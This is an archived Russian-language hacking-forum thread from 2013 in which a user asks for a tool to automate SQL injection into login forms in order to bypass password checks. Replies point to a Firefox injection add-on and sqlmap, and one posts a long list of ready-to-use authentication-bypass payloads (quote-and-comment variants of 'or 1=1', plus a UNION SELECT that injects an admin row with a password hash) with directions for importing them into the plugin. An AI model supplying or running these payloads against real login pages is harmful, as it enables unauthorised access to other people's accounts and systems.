Просмотр полной версии : Есть ли софт для автоматизации sql inj при авторизации?
psihoz26
22.10.2013, 17:28
Нужен софт в который я вставлю запрос авторизации и за место пароля он пробовла бы подставлять
+or+1=1+--+
+or+1+--+
и т.д.
таким образом пытаясь обойти введение пароля.
Встречал ли кто подобное?
Или может кто подскажет где найти довольно большой лист подобных кусков запроса??
https://addons.mozilla.org/ru/firefox/addon/sql-inject-me/
Для полного счастья:
Code:
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
Перегоняешь в XML, затем импортируешь в плагин.
ТС хочет сказать по русский что он хочет брутить гет запросы видимо sqlmap юзай)
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot